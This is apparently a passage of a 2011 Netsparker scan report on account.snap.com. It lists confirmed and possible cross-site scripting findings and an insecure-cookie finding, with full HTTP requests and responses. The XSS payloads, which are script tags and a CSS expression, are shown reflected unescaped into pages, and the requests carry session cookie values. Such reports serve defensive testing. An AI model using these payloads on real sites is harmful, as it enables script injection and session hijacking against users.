&amp;key=<b>29b1ec081f2bf5401db979cf98f6b845</b>&amp;th=silver..."&gt;&lt;/script&gt;</div> <div class="clear"></div><div id="leftSide"><h1>Import Your Old Snap Shots Settings</h1><form action="/importsettings.php" method="post"> <div id="column2"> <input type="hidden" name="email" value="netsparker@example.com"> <input type="hidden" name="key" value="'"--></style></script><script>netsparker(0x000248)</script>"> <input type="hidden" name="retry" value="1"> <ul id="Failed"> <li> <h2 class="red0">Validation Failed: Bad Match</h2> </li> <li> We were unable to find a match between the Email and Site URL that you provided. </li> <li> <h5>Email</h5> netsparker@example.com </li> <li> <h5>Site URL</h5> '"--></style></script><script>netsparker(0x000248)</script> </li> <li> Please make sure that both the Email and the Site URL are correct and feel free to try again. </li> <li> Or, if you would rather just keep going right now, you can choose to start fresh with a new account and a new Snap Shots installation. </li> <li> <div class="l"> <a href="/signup.php"><img src="/images/btn-createNew.gif" width="160" height="31" alt="Create New Account" title="Create New Account" /></a> </div> <div class="r"> <input type="image" class="image" src="/images/btn-tryAgain.gif" width="156" height="31" alt="Try Again" title="Try Again" /> </div> </li> <div class="clear"></div> </ul> </form> </div> <div id="column1"> </div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/importsettings.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
- /importsettings.php

/importsettings.php CONFIRMED

https://account.snap.com/importsettings.php

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x000491)</script>
key POST 3
x POST 0
y POST 0

Request

POST /importsettings.php HTTP/1.1
Referer: https://account.snap.com/importsettings.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=4329620185993f511f5aa3410492abe9
Content-Length: 105
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000491)%3c%2fscript%3e&key=3&x=0&y=0

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 22:39:14 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 5281
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script type="text/javascript" language="javascript">// <! Tooltip Functions function xstooltip_findPosX(obj) { var curleft = 0; if (obj.offsetParent) { while (obj.offsetParent) { curleft += obj.offsetLeft obj = obj.offsetParent; } } else if (obj.x) curleft += obj.x; return curleft;}function xstooltip_findPosY(obj) { var curtop = 0; if (obj.offsetParent) { while (obj.offsetParent) { curtop += obj.offsetTop obj = obj.offsetParent; } } else if (obj.y) curtop += obj.y; return curtop;}function xstooltip_show(tooltipId, parentId, posX, posY){ it = document.getElementById(tooltipId); if ((it.style.top == '' || it.style.top == 0) && (it.style.left == '' || it.style.left == 0)) { // need to fixate default size (MSIE problem) it.style.width = it.offsetWidth + 'px'; it.style.height = it.offsetHeight + 'px'; img = document.getElementById(parentId); // if tooltip is too wide, shift left to be within parent if (posX + it.offsetWidth > img.offsetWidth) posX = img.offsetWidth - it.offsetWidth; if (posX < 0 ) posX = 0; x = xstooltip_findPosX(img) + posX; y = xstooltip_findPosY(img) + posY; it.style.top = y + 'px'; it.style.left = x + 'px'; } it.style.visibility = 'visible'; }function xstooltip_hide(id){ it = document.getElementById(id); it.style.visibility = 'hidden'; }// ]]></script><div id="top-cap"></div><div id="wrapper"><div id="tip1" class="tooltip"> Your Shots Key was created when you signed up for Snap Shots and can be <br /> found inside the Snap Shots JavaScript tag (view source) on any page where <br /> you currently have Snap Shots enabled. <br /><br /> Example of Snap Shots JavaScript tag: <br /> &lt;script type="text/javascript" src="http://shots.snap.com/snap_shots.js?ap=1<br /> &amp;key=<b>29b1ec081f2bf5401db979cf98f6b845</b>&amp;th=silver..."&gt;&lt;/script&gt;</div> <div class="clear"></div><div id="leftSide"><h1>Import Your Old Snap Shots Settings</h1><form action="/importsettings.php" method="post"> <div id="column2"> <input type="hidden" name="email" value="'"--></style></script><script>netsparker(0x000491)</script>"> <input type="hidden" name="key" value="3"> <input type="hidden" name="retry" value="1"> <ul id="Failed"> <li> <h2 class="red0">Validation Failed: Bad Match</h2> </li> <li> We were unable to find a match between the Email and Site URL that you provided. </li> <li> <h5>Email</h5> '"--></style></script><script>netsparker(0x000491)</script> </li> <li> <h5>Site URL</h5> 3 </li> <li> Please make sure that both the Email and the Site URL are correct and feel free to try again. </li> <li> Or, if you would rather just keep going right now, you can choose to start fresh with a new account and a new Snap Shots installation. </li> <li> <div class="l"> <a href="/signup.php"><img src="/images/btn-createNew.gif" width="160" height="31" alt="Create New Account" title="Create New Account" /></a> </div> <div class="r"> <input type="image" class="image" src="/images/btn-tryAgain.gif" width="156" height="31" alt="Try Again" title="Try Again" /> </div> </li> <div class="clear"></div> </ul> </form> </div> <div id="column1"> </div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/importsettings.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
- /importsettings.php

/importsettings.php CONFIRMED

https://account.snap.com/importsettings.php

Parameters

Parameter Type Value
email POST netsparker@example.com
key POST '"--></style></script><script>alert(0x000496)</script>
x POST 0
y POST 0

Request

POST /importsettings.php HTTP/1.1
Referer: https://account.snap.com/importsettings.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=4329620185993f511f5aa3410492abe9
Content-Length: 128
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email=netsparker%40example.com&key='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000496)%3c%2fscript%3e&x=0&y=0

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 22:39:18 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 5323
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script type="text/javascript" language="javascript">// <! Tooltip Functions function xstooltip_findPosX(obj) { var curleft = 0; if (obj.offsetParent) { while (obj.offsetParent) { curleft += obj.offsetLeft obj = obj.offsetParent; } } else if (obj.x) curleft += obj.x; return curleft;}function xstooltip_findPosY(obj) { var curtop = 0; if (obj.offsetParent) { while (obj.offsetParent) { curtop += obj.offsetTop obj = obj.offsetParent; } } else if (obj.y) curtop += obj.y; return curtop;}function xstooltip_show(tooltipId, parentId, posX, posY){ it = document.getElementById(tooltipId); if ((it.style.top == '' || it.style.top == 0) && (it.style.left == '' || it.style.left == 0)) { // need to fixate default size (MSIE problem) it.style.width = it.offsetWidth + 'px'; it.style.height = it.offsetHeight + 'px'; img = document.getElementById(parentId); // if tooltip is too wide, shift left to be within parent if (posX + it.offsetWidth > img.offsetWidth) posX = img.offsetWidth - it.offsetWidth; if (posX < 0 ) posX = 0; x = xstooltip_findPosX(img) + posX; y = xstooltip_findPosY(img) + posY; it.style.top = y + 'px'; it.style.left = x + 'px'; } it.style.visibility = 'visible'; }function xstooltip_hide(id){ it = document.getElementById(id); it.style.visibility = 'hidden'; }// ]]></script><div id="top-cap"></div><div id="wrapper"><div id="tip1" class="tooltip"> Your Shots Key was created when you signed up for Snap Shots and can be <br /> found inside the Snap Shots JavaScript tag (view source) on any page where <br /> you currently have Snap Shots enabled. <br /><br /> Example of Snap Shots JavaScript tag: <br /> &lt;script type="text/javascript" src="http://shots.snap.com/snap_shots.js?ap=1<br /> &amp;key=<b>29b1ec081f2bf5401db979cf98f6b845</b>&amp;th=silver..."&gt;&lt;/script&gt;</div> <div class="clear"></div><div id="leftSide"><h1>Import Your Old Snap Shots Settings</h1><form action="/importsettings.php" method="post"> <div id="column2"> <input type="hidden" name="email" value="netsparker@example.com"> <input type="hidden" name="key" value="'"--></style></script><script>netsparker(0x000496)</script>"> <input type="hidden" name="retry" value="1"> <ul id="Failed"> <li> <h2 class="red0">Validation Failed: Bad Match</h2> </li> <li> We were unable to find a match between the Email and Site URL that you provided. </li> <li> <h5>Email</h5> netsparker@example.com </li> <li> <h5>Site URL</h5> '"--></style></script><script>netsparker(0x000496)</script> </li> <li> Please make sure that both the Email and the Site URL are correct and feel free to try again. </li> <li> Or, if you would rather just keep going right now, you can choose to start fresh with a new account and a new Snap Shots installation. </li> <li> <div class="l"> <a href="/signup.php"><img src="/images/btn-createNew.gif" width="160" height="31" alt="Create New Account" title="Create New Account" /></a> </div> <div class="r"> <input type="image" class="image" src="/images/btn-tryAgain.gif" width="156" height="31" alt="Try Again" title="Try Again" /> </div> </li> <div class="clear"></div> </ul> </form> </div> <div id="column1"> </div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/importsettings.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /login.php

/login.php CONFIRMED

https://account.snap.com/login.php

Identified Cookie

PHPSESSID

Request

GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:07:51 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=3807e7a155fa600b1bf882a69d2f4cde; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 3483
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<div id="top-cap"></div><div id="wrapper"><div id="leftSide"><h1>Log in to your Snap Account</h1><div id="colCombine"> <form id="login" name="login" action="/login.php" method="post"> <p>If you don't have a Snap account, start by <a href="/signup.php">creating one</a>.</p> <ul id="enterInfo"> <li> <h2>Please Enter Your Email and Password</h2> </li> <li> <h5>Your Email:</h5> <input tabindex="1" type="text" id="enter" class="text" name="email" value=""> </li> <li> <h5>Your Password: <span><a tabindex="5" href="forgot_password.php">Forgot your password?</a></span></h5> <input tabindex="2" type="password" class="text" name="password" value=""> </li> <li id="remember"> <input tabindex="3" name="remember_me" value="1" type="checkbox"> Remember Me <small>(on this computer until you log out)</small> </li> <li class="btn"> <input tabindex="4" type="image" name="submit" src="/images/btn-login.gif" width="181" height="31" alt="Log In" title="Log In" /> </li> </form> <li class="dotted"> <p> <h5>Already have Snap Shots on your site but no account?</h5> <a tabindex="6" href="/importsettings.php">Click here</a> to create an account based on your current settings. </p> </li> </ul></div></div><div id="rightSide"><div class="sidebar"><h4>Recent Blog Posts</h4></div><div class="sidebar2"><h4>Special Offers</h4><a href="http://www.atomz.com/snap.html"><img src="images/atomz_ad.jpg" alt="Atomz - Free Site Search for Your Website" border="0" width="180" height="150" /></a></div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/login.php#" + currentTab);} else { urchinTracker();}</script><form id="login_form" method="POST" action="login.php"> <input type="hidden" name="tab" value="1"></form></div><script>document.getElementById("enter").focus();</script></body></html>
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

3 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /add_site.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

/add_site.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

https://account.snap.com/add_site.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

Parameters

Parameter Type Value
URI-BASED Raw URI /" stYle="x:expre/**/ssion(alert(9))

Notes

This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.

Request

GET /add_site.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: https://account.snap.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Found
Date: Sat, 23 Jul 2011 22:29:22 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login.php
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'setup';</script><script type="text/javascript" src="/javascript/jquery.js"></script>

<div id="top-cap"></div>
<div id="wrapper">


<div class="clear"></div>
<div id="leftSide">
<ul id="tabs"><li><span class="tab-on">Site Info</span></li><li><span class="">Customization</span></li><li><span class="">Installation</span></li><li><span class="tab-off">Snap Shares&trade;</span></li> </ul>
<div id="statusInfo">
</div>

<form id="setup_form" name="setup_form" action="/add_site.php/" stYle="x:expre/**/ssion(netsparker(9))" method="post">


<div id="column2">
<div id="terms">
<h2>Terms & Conditions</h2>
<textarea name="terms" readonly="readonly" value="">Snap Shots Terms of Use PolicyPLEASE READ VERY CAREFULLY THESE TERMS OF USE FOR THE SNAP SHOTS PROGRAM, INCLUDING THE SNAP SHARES FEATURES, BEFORE REGISTERING. PARTICIPATION IN THIS PROGRAM INDICATES THAT YOU ACCEPT THESE TERMS AND CONDITIONS. IF YOU DO NOT ACCEPT THESE TERMS AND CONDITIONS, PLEASE DO NOT REGISTER TO PARTICIPATE IN THE SNAP SHARES ONLINE PROGRAM. 1. Program Participation. In order to participate in the Snap Shots Program, including Snap Shares (the "Program"), participants ("You" and "Your") will need to complete a set up procedure with Snap Technologies, Inc. ("Snap"), and in order to use the Snap Shares features, you will also have to provide your account information for an active account with third party advertising service provider such as Commission Junction or Amazon.com Associates. Snap reserves the right to refuse participation to any applicant or participant at any time in its sole discretion. By enrolling in the Program, You agree to comply with the then applicable policies ("Policies"), found at http://www.snap.com/snapshots_faq.php, and agree that Snap may serve advertisements, links and search result information (collectively the "Ads") in combination with the Snap Shot technology available on your Web Site (the "Site" or "Site(s)"). You agree to comply with the specifications provided by Snap from time to time to enable proper display, tracking, and delivery of the Program.2. Program Rules and Restrictions. The Program is designed to allow You to make some choices about how the Program will appear on Your Web Site. The Program will also allow you to select some of the ads to serve on Snap Shots from the list of available choices, if you choose to Participate in Snap Shares. Snap retains the right, in its sole discretion, to set the rules for all ad runs (and of course, we will attempt to choose to show ads relevant to your Site's content) and the right to restrict or limit the types of ads available for different types of Sites. In addition, the Snap Share Program may not work all the time or with all Snap Shot features.3. Program Changes and Updates. Snap reserve the right, in our sole discretion, to change all or part of these Terms and Conditions and/or the Policies and to change or discontinue the Program at any time, with or without notice. Your continued participation in the Program will constitute your acceptance of the then-current terms and conditions and Policies. You are responsible to check for updates. Changes and updates to these Terms will be effective immediately after they are posted at: https://account.snap.com/print_terms.php.4. Your Representations, Warranties and Responsibilities. As of the date that you enter into the Program and for as long as you participate, you represent warrant and covenant that: A. You are the registered owner of the Site(s), including the domain names and all content contained therein or that You are legally authorized to act on behalf of the owner of such Site(s) for the purposes of this Agreement and the Program; B. Your participation in the is subject to compliance Snap's Policies including suitable content and that violation of a Policy will constitute a material breach of these Terms & Conditions; C. You will abide by all applicable laws, rules and regulations and you will not display or use any content that would infringe the rights of any third party including copyright or trademark laws; D. You are solely responsible for the operation of Your Site(s), including all content and materials, maintenance and operation thereof. Snap is not responsible for anything related to Your Site(s). 5. Prohibited Uses. In order to ensure a successful Program for all participants, You shall not: A. Use the Program for any automated, deceptive, fraudulent or other invalid mean; to damage, disable, overburden, or impair Snap's or any other party's search services, servers, or other equipment or services; or to act in any way that violates any Program Policies posted on the Snap Web Site, as may be revised from time to time, or any other agreement between You and Snap (including without limitation the Snap Affiliate Agreement); B. Modify the Snap Shots or Ads in any way including displaying content that may obscure the appearance of the Snap Shots or result in the accidental clicking on the Ads; C. Use Snap Shots, Ads or Snap code on a site that does not belong to You; D. Use Snap Shots or Ads in conjunction with framing any webpage that is not within Your Site(s); E. Cache Snap Shots or Ads; F. Click on any Ads provided by Snap for Your Site(s) or provide and incentive or encouragement to users of the Sites(s) to click on Ads, including but not limited to language directing users to click on the Ads or informing users that they can support Your Site clicking on the Ads; G. Use, authorize or enable any automated means of generating impressions or clicks on Snap Shots or Ads or any manual means of generating fraudulent or invalid Snap Shot impressions or Ad clicks; H. Interfere with the intended behavior of the ads such as redirecting the user who has clicked on a Snap Shot or Ad; I. Modify Snap code in any way; J. Engage in any action or practice that reflects poorly on Snap or otherwise disparages or devalues Snap's reputation or goodwill.You acknowledge that any attempted participation or violation of any of the foregoing is a material breach of this Agreement and that we may pursue any and all applicable legal and equitable remedies against You, including an immediate suspension of Your account or termination of this Agreement, and the pursuit of all available civil or criminal remedies. 6. Termination; Cancellation. You may stop using this Program at any time by removing snap code and providing us with written notice to customerservice@snap.com. Snap reserves the right to terminate your participation in the Program at any time without liability to you or any third party and may require You to remove Snap JavaScript or similar code from Your Site(s) upon our request. Snap may at any time, in its sole discretion, also terminate or suspend all or part of the Program for any reason.7. No Warranty. SNAP MAKES NO WARRANTY, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION WITH RESPECT TO THE PROGRAM, OR THE ADVERTISING FEATURE THEREIN, AND EXPRESSLY DISCLAIMS THE WARRANTIES OR CONDITIONS OF NONINFRINGEMENT, MERCHANTABILITY, FITNESS FOR ANY PARTICULAR PURPOSE, OR ACCURACY OF INFORMATIONAL CONTENT. SNAP MAKES NO WARRANTY THAT THE SITE WILL MEET YOUR REQUIREMENTS, OR THAT SERVICES WILL BE UNINTERRUPTED, TIMELY, SECURE OR ERROR FREE, NOR DOES SNAP MAKE ANY WARRANTY AS TO THE RESULTS THAT MAY BE OBTAINED FROM THE USE OF THE PROGRAM OR THAT ALL DEFECTS WILL BE CORRECTED. 8. LIMITATIONS OF LIABILITY. IN NO EVENT WHATSOEVER SHALL SNAP, ITS PARENT COMPANY, SHAREHOLDERS, AFFILIATES, SUPPLIERS OR THEIR RESPECTIVE EMPLOYEES, SHAREHOLDERS, AGENTS, OR REPRESENTATIVES BE LIABLE FOR ANY INDIRECT, CONSEQUENTIAL, INCIDENTAL, SPECIAL, PUNITIVE OR EXEMPLARY DAMAGES, OR FOR ANY LOSS OF PROFITS OR REVENUE, INCLUDING BUT NOT LIMITED TO LOSS OF SALES, PROFIT, REVENUE, GOODWILL, OR DOWNTIME, (HOWEVER ARISING IN TORT, CONTRACT, OR OTHERWISE) REGARDLESS OF SUCH PARTY'S NEGLIGENCE OR WHETHER SUCH PARTY KNEW OR SHOULD HAVE KNOWN OF THE POSSIBILITY OF SUCH DAMAGES. YOU UNDERSTAND AND AGREE THAT THE USE OF THIS SITE IS AT YOUR DISCRETION AND RISK AND THAT YOU WILL BE SOLELY RESPONSIBLE FOR ANY LOSS OR DAMAGE TO YOUR COMPUTER SYSTEM OR LOSS OF DATA THAT MAY RESULT FROM YOUR USE OF THE SITE. SNAP NEITHER ASSUMES, NOR AUTHORIZES ANY OTHER PARTY TO ASSUME ON ITS BEHALF, ANY OTHER LIABILITY IN CONNECTION WITH THE PROVISION OF THE SITE. THE LIMITATIONS OF LIABILITY PROVIDED IN THIS AGREEMENT INURE TO THE BENEFIT OF SNAP, ITS PARENT COMPANY, SHAREHOLDERS, AFFILIATES AND TO ALL OF ITS RESPECTIVE OFFICERS, DIRECTORS, EMPLOYEES, ATTORNEYS AND AGENTS. IN NO EVENT SHALL SNAP'S TOTAL CUMULATIVE LIABILITY UNDER THIS AGREEMENT EXCEED US$50. SOME STATES OR OTHER JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO PORTIONS OF THE FOREGOING MAY NOT APPLY TO YOU, BUT THEN LIABILITY SHOULD BE LIMITED TO THE FULL EXTENT OF THE LAW. 9. Force Majeure. Neither party shall have any liability for any failure or delay resulting from any condition beyond the reasonable control of such party, including but not limited to governmental action or acts of terrorism, earthquake or other acts of God, labor conditions, and power failures. 10. Indemnification. You agree to indemnify and hold Snap and its affiliates and each of their employees, contractors, agents, officers, and directors harmless, including reasonable attorneys' fees, from any claim or demand made by any third party in connection with or arising out of your use of the Program, your violation of any term, condition, representation, or warranty contained in this Terms of Use, your violation of applicable laws, or your violation of the rights of any other person or entity.11. Intellectual Property Rights. You acknowledge that Snap owns all right, title and interest, including without limitation all Intellectual Property Rights (as defined below), in and to the Program (excluding items licensed by Snap from third parties), and that You will not acquire any right, title, or interest in or to the Program. You will not modify, adapt, translate, prepare derivative works from, decompile, reverse engineer, disassemble or otherwise attempt to derive source code from any Snap services, software, or documentation, or create or attempt to create a substitute or similar service or product through use of or access to the Program or proprietary information related thereto. You will not remove, obscure, or alter Snap's copyright notice, Brand Features, or other proprietary rights notices affixed to or contained within any Snap services, software, or documentation (including without limitation the display of Snap's Brand Features with Ads, Links, Search Boxes, Search Results, and/or Search Buttons, as applicable). "Intellectual Property Rights" means any and all rights existing from time to time under patent law, copyright law, moral rights law, trade secret law, trademark law, unfair competition law, publicity rights law, privacy rights law, and any and all other proprietary rights, as well as, any and all applications, renewals, extensions, restorations and re-instatements thereof, now or hereafter in force and effect worldwide. 12. Use of Information. During your participation in the Program, Snap's technology will collect, store and send information back to Snap or third party servers, including referring URL's, crawled content of your Sites(s), user IP addresses, impressions, click throughs and search queries. Snap will use that information to operate the Program and may share that data with third parties. In addition, Snap may retain and use the information you provide from registering for the Program, subject to the terms of the Snap Privacy Policy (located at http://www.snap.com/about/privacy.php or such other URL as Snap may provide from time to time), including but not 